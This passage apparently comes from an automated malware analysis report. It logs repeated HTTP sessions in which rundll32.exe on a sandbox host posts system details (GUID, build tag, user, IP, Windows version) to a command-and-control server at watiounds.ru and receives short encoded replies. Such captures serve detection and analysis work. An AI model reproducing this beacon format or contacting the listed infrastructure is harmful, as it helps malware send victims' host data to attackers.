                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:17.746145964 CEST315INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:17 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 47 54 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCGTXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          251192.168.2.224941695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:18.072494030 CEST316OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:18.198662996 CEST316INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:18 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 4e 4d 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNNMMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          252192.168.2.224941795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:18.527034044 CEST317OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:18.657521963 CEST317INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:18 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 4e 4d 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNNMMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          253192.168.2.224941895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:18.975282907 CEST318OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:19.098356962 CEST318INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:19 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 5a 41 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMZANARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          254192.168.2.224941995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:19.427859068 CEST319OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:19.552073002 CEST320INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:19 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 42 59 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTBYGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          255192.168.2.224942095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:19.885044098 CEST320OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:20.013376951 CEST321INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:19 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 56 45 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNVEMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          256192.168.2.224942195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:20.344010115 CEST321OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:20.468288898 CEST322INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:20 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 43 58 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cACXZARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          257192.168.2.224942295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:20.776747942 CEST323OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:20.902153969 CEST323INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:20 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 59 42 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZYBAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          258192.168.2.224942395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:21.226422071 CEST324OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:21.355878115 CEST324INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:21 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 46 55 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFFUUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          259192.168.2.224942495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:21.675112009 CEST325OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:21.801229000 CEST325INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:21 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 42 59 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFBYUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          26192.168.2.224919195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:21:35.106446028 CEST64OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:21:35.228140116 CEST64INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:21:35 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4e 4d 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZNMAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          260192.168.2.224942595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:22.127002954 CEST326OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:22.250658989 CEST326INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:22 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZVEAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          261192.168.2.224942695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:22.584753036 CEST327OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:22.707726955 CEST327INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:22 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 51 4a 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKQJPARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          262192.168.2.224942795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:23.030031919 CEST328OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:23.154145956 CEST329INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:23 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 43 58 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQCXJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          263192.168.2.224942895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:23.483021021 CEST329OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:23.609416962 CEST330INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:23 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 4e 4d 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYNMBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          264192.168.2.224942995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:23.937474012 CEST330OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:24.068602085 CEST331INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:24 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 5a 41 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMZANARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          265192.168.2.224943095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:24.392395020 CEST331OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:24.523158073 CEST332INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:24 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 56 45 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKVEPARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          266192.168.2.224943195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:23:24.855385065 CEST333OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:23:24.998523951 CEST333INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:23:24 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 5a 41 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKZAPARRABw==0


